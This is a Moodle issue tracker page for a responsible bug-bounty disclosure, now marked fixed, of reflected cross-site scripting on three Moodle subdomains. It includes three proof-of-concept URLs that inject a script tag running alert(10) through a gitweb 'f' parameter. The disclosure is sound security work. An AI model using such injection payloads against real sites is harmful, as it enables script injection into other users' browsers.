Uploaded image for project: 'Moodle Community Sites'
  1. Moodle Community Sites
  2. MDLSITE-3072

XSS on 3+ Moodle Subdomains

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Priority: High
    • Resolution: Fixed
    • Component/s: git.moodle.org
    • Labels:
      None

      Description

      To Whom It May Concern,

      I am reporting a few XSS security issues in accordance with your Bug
      Bounty security policy:

      https://moodle.org/mod/forum/view.php?f=996&showall=1

      I have included the proof-of-concepts in the email below to help
      expedite the explanation process.

      The information in the attached file is not public.

      Please feel free to contact me if there are any questions. I look
      forward to working with you in order to remediate the reported issues.

      Thanks,
      Ken

      ------------------------------
      http://git.moodle.org/gw?f=%22/%3E%3Cscript%3Ealert%2810%29%3C/script%3E&a=history&hb=cee922825283e76290b681edda93cf09a03d546b&pg=1\n&p=integration.git
      ---------------------------------
      http://broadcast.moodle.org/gw?f="/><script>alert(10)</script>&a=history&hb=7d19bc135372f5e0dc98776871b0287b9b7353da&pg=1\n&p=moodle.git
      ---------------------------------
      http://conference.moodle.org/gw?f="/><script>alert(10)</script>&a=history&hb=cee922825283e76290b681edda93cf09a03d546b&pg=1\n&p=integration.git

        Attachments

          Activity

            People

            Assignee:
            mspurrier Matt Spurrier
            Reporter:
            kbelva Kenneth Belva
            Tester:
            David Mudrák (@mudrd8mz) David Mudrák (@mudrd8mz)
            Participants:
            Component watchers:
            David Mudrák (@mudrd8mz)
            Votes:
            1 Vote for this issue
            Watchers:
            8 Start watching this issue

              Dates

              Created:
              Updated:
              Resolved: